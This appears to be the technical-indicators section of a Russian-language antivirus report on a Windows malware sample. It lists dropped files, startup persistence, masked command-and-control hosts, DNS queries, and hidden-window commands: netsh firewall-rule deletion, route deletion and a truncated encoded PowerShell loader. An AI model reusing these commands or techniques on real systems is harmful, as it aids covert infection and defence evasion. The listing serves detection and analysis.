Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\system32.vbs
- %HOMEPATH%\pictures\cc.exe
- %TEMP%\nsne310.tmp
- %TEMP%\nsse330.tmp\nsexec.dll
- %TEMP%\nsse330.tmp\repackme.gif
- %TEMP%\nsse330.tmp\newadvsplash.dll
- %TEMP%\nsse330.tmp\langdll.dll
- %HOMEPATH%\pictures\update.vbs
- 'up####.myiphost.com':1188
- 'on####ve.live.com':443
- 'k7####.#n.files.1drv.com':443
- 'an####ousfiles.io':443
- DNS ASK on####ve.live.com
- DNS ASK k7####.#n.files.1drv.com
- DNS ASK an####ousfiles.io
- DNS ASK up####.myiphost.com
- '%HOMEPATH%\pictures\cc.exe'
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Pictures\update.vbs"
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="all" remoteip=95.141.193.133' (со скрытым окном)
- '%WINDIR%\syswow64\route.exe' delete 95.141.193.133' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...' (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="all" remoteip=95.141.193.133
- '%WINDIR%\syswow64\route.exe' delete 95.141.193.133
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...